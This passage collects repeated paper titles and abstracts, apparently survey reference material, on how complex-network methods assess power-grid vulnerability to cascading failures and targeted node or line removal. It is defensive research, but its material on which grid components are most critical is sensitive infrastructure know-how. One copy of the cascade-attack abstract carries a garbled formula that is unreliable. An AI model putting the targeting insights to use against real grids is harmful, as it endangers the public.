i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. 
We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... 
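Connectivity loss, one of the vulnerability measures named in the entry above, is simple to express in code; the sketch below assumes networkx and reads the metric purely topologically (a load bus counts a generator as reachable if both sit in the same connected component after the removals), which is only one plausible formulation.

```python
import networkx as nx

def connectivity_loss(G, generators, loads, removed):
    """Average fraction of generators that each load bus can no longer reach
    after the buses in `removed` are taken out of service (1.0 = total loss)."""
    H = G.copy()
    H.remove_nodes_from(removed)
    losses = []
    for load in loads:
        if load not in H:
            losses.append(1.0)
            continue
        component = nx.node_connected_component(H, load)
        reachable = sum(1 for g in generators if g in component)
        losses.append(1.0 - reachable / len(generators))
    return sum(losses) / len(losses)

# Toy 6-bus feeder: generators at buses 0 and 5, loads at buses 2 and 3.
G = nx.path_graph(6)
print(connectivity_loss(G, generators=[0, 5], loads=[2, 3], removed=[]))      # 0.0
print(connectivity_loss(G, generators=[0, 5], loads=[2, 3], removed=[4]))     # 0.5
print(connectivity_loss(G, generators=[0, 5], loads=[2, 3], removed=[1, 4]))  # 1.0
```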
--- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Cascade-based attack vulnerability on the US power grid paper_content: The vulnerability of real-life networks subject to intentional attacks has been one of the outstanding challenges in the study of the network safety. Applying the real data of the US power grid, we compare the effects of two different attacks for the network robustness against cascading failures, i.e., removal by either the descending or ascending orders of the loads. Adopting the initial load of a node j to be Lj !" kj# Rm2Cj km$% a with kj and Cj being the degree of the node j and the set of its neighboring nodes, respectively, where a is a tunable parameter and governs the strength of the initial load of a node, we investigate the response of the US power grid under two attacks during the cascading propagation. In the case of a < 0:7, our investigation by the numerical simulations leads to a counterintuitive finding on the US power grid that the attack on the nodes with the lowest loads is more harmful than the attack on the ones with the highest loads. In addition, the almost same effect of two attacks in the case ofa ! 0:7 may be useful in furthering studies on the control and defense of cascading failures in the US power grid. --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. 
The North China power grid is used as an example to validate the proposed method. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. 
Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non-topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmission substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Originally published in: WIT Transactions on Ecology and the Environment, 2009, vol. 121, p. 527-537 --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly.
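As a concrete illustration of the random-versus-selective node-removal analyses surveyed in the entries above, the following minimal Python sketch measures how the giant connected component shrinks under random failures and degree-targeted attacks. It assumes the networkx library; the Watts–Strogatz test graph, removal fractions, and seeds are illustrative stand-ins, not the actual grid data used in those papers.

```python
import random
import networkx as nx

def giant_component_fraction(G, original_n):
    """Fraction of the original node count contained in the largest connected component."""
    if G.number_of_nodes() == 0:
        return 0.0
    return max(len(c) for c in nx.connected_components(G)) / original_n

def remove_nodes(G, fraction, targeted=False, seed=0):
    """Remove a fraction of nodes, either uniformly at random or by descending degree."""
    H = G.copy()
    k = int(fraction * H.number_of_nodes())
    if targeted:
        ranked = sorted(H.degree, key=lambda pair: pair[1], reverse=True)
        victims = [node for node, _ in ranked[:k]]
    else:
        rng = random.Random(seed)
        victims = rng.sample(list(H.nodes), k)
    H.remove_nodes_from(victims)
    return H

# Illustrative sparse graph standing in for a transmission-grid topology.
G = nx.connected_watts_strogatz_graph(n=300, k=4, p=0.1, seed=1)
n0 = G.number_of_nodes()
for f in (0.05, 0.10, 0.20):
    rand_frac = giant_component_fraction(remove_nodes(G, f, targeted=False), n0)
    targ_frac = giant_component_fraction(remove_nodes(G, f, targeted=True), n0)
    print(f"removed {f:.0%}: random -> {rand_frac:.2f}, degree-targeted -> {targ_frac:.2f}")
```

On heterogeneous topologies the degree-targeted curve typically collapses much faster than the random one, which is the qualitative error-versus-attack pattern these vulnerability studies report.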
--- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and edges and further analysis can help in identifying the important lines. This paper proposes a new betweenness index, using the reactance of the transmission lines as the weight, as a criterion to measure the vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. More power is transmitted along the lines with less reactance, to reach from the source node to destination node, which gives the edges with less reactance a higher weight in the analysis. The analyses have been carried out on the IEEE 39 bus system and IEEE 118 Bus System. The new betweenness index can identify the critical lines of the system, either due to their position in the network or by the power they transmit along the network.
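To make the reactance-weighted betweenness idea from the entry above concrete, here is a minimal sketch that ranks lines by edge betweenness computed over lowest-reactance paths. It is not the authors' exact index: networkx is assumed, and the six-bus network and per-unit reactance values are invented purely for illustration.

```python
import networkx as nx

# Toy reactance-weighted grid: nodes are buses/generators/loads, edge weight is line reactance (p.u.).
edges = [
    ("G1", "B1", 0.02), ("B1", "B2", 0.06), ("B1", "B3", 0.05),
    ("B2", "B3", 0.04), ("B2", "L1", 0.03), ("B3", "L2", 0.08),
]
G = nx.Graph()
G.add_weighted_edges_from(edges, weight="reactance")

# Edge betweenness with reactance as the path cost: shortest "electrical" paths
# concentrate on low-reactance lines, which are then flagged as critical.
eb = nx.edge_betweenness_centrality(G, weight="reactance", normalized=True)
for (u, v), score in sorted(eb.items(), key=lambda kv: kv[1], reverse=True):
    print(f"{u}-{v}: {score:.3f}")
```

The same pattern extends to the maximum-flow and electrical-betweenness variants discussed in later entries by swapping the path-based centrality for a flow-based one.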
--- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. 
This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: LOCATING CRITICAL LINES IN HIGH-VOLTAGE ELECTRICAL POWER GRIDS paper_content: Electrical power grids are among the infrastructures that are attracting a great deal of attention because of their intrinsic criticality. Here we analyze the topological vulnerability and improvability of the spanish 400 kV, the french 400 kV and the italian 380 kV power transmission grids. For each network we detect the most critical lines and suggest how to improve the connectivity. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. 
In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Vulnerability Assessment of Power Grid Using Graph Topological Indices paper_content: This paper presents an assessment of the vulnerability of the power grid to blackout using graph topological indexes. Based on a FERC 715 report and the outage reports, the cascading faults of summer WSCC 1996 are reconstructed, and the graphical property of the grid is compared between two cases: when the blackout triggering lines are removed simulating the actual sequence of cascading outages and when the same number of randomly selected lines are removed. The investigation finds that the critical path lengths of the triggering events of the July and August outages of 1996 WSCC blackout are higher than those of no-outage and arbitrary events. In addition, the small world-ness index for each of the outage triggering events is much smaller than that of normal or any no-outage scenario, indicating that events of shifting a network from small world to a random network would be more likely cascaded to wide area outage. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. 
In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. 
Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Cascade-based attack vulnerability on the US power grid paper_content: The vulnerability of real-life networks subject to intentional attacks has been one of the outstanding challenges in the study of network safety. Applying the real data of the US power grid, we compare the effects of two different attacks on the network's robustness against cascading failures, i.e., removal by either the descending or ascending orders of the loads. Adopting the initial load of a node \(j\) to be \(L_j = [k_j (\sum_{m \in C_j} k_m)]^{\alpha}\) with \(k_j\) and \(C_j\) being the degree of the node \(j\) and the set of its neighboring nodes, respectively, where \(\alpha\) is a tunable parameter that governs the strength of the initial load of a node, we investigate the response of the US power grid under two attacks during the cascading propagation. In the case of \(\alpha < 0.7\), our numerical simulations lead to a counterintuitive finding on the US power grid that the attack on the nodes with the lowest loads is more harmful than the attack on the ones with the highest loads. In addition, the almost identical effect of the two attacks in the case of \(\alpha = 0.7\) may be useful in furthering studies on the control and defense of cascading failures in the US power grid. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non-topological reliability measures.
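The cascading-failure entries above share a common load-capacity mechanism: assign each node an initial load, give it a capacity proportional to that load, and iteratively remove any node whose recomputed load exceeds its capacity. The sketch below is a simplified illustration rather than either paper's exact model: networkx is assumed, node betweenness is used as a proxy for load, and the Barabási–Albert test graph and tolerance value are arbitrary. It also evaluates the degree-based initial load \(L_j = [k_j(\sum_{m \in C_j} k_m)]^{\alpha}\) from the attack-vulnerability study.

```python
import networkx as nx

def initial_loads(G, alpha=0.7):
    """Degree-based initial load L_j = (k_j * sum of neighbour degrees)^alpha,
    with alpha the tunable parameter from the entry above."""
    deg = dict(G.degree)
    return {j: (deg[j] * sum(deg[m] for m in G[j])) ** alpha for j in G}

def cascade(G, trigger, tolerance=0.2):
    """Simplified load-capacity cascade: capacities are (1 + tolerance) times the
    initial betweenness load; after each failure, loads are recomputed and any
    node exceeding its capacity is removed, until no further overloads occur."""
    H = G.copy()
    load = nx.betweenness_centrality(H)
    cap = {n: (1.0 + tolerance) * load[n] for n in H}
    H.remove_node(trigger)
    failed = {trigger}
    while True:
        load = nx.betweenness_centrality(H)
        overloaded = [n for n in H if load[n] > cap[n]]
        if not overloaded:
            break
        H.remove_nodes_from(overloaded)
        failed.update(overloaded)
    return failed

G = nx.barabasi_albert_graph(200, 2, seed=3)   # stand-in heterogeneous topology
hub = max(G.degree, key=lambda pair: pair[1])[0]  # attack the highest-degree node
print("initial load of hub:", round(initial_loads(G)[hub], 1))
print("nodes lost in cascade:", len(cascade(G, hub, tolerance=0.2)))
```

Sweeping the tolerance parameter reproduces the qualitative trade-off reported in these studies: small tolerances let a single well-chosen removal trigger a large cascade, while larger tolerances confine the damage.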
--- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. 
We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and vertices and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and criteria to measure of vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. More power is transmitted along the lines with less reactance, to reach from the source node to destination node, which gives the edges with less reactance a higher weight in the analysis. The analyzes have been carried out on the IEEE 39 bus system and IEEE 118 Bus System. The new betweenness index can identify the critical lines of the system, either due to their position in the network or by the power they transmit along the network. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, 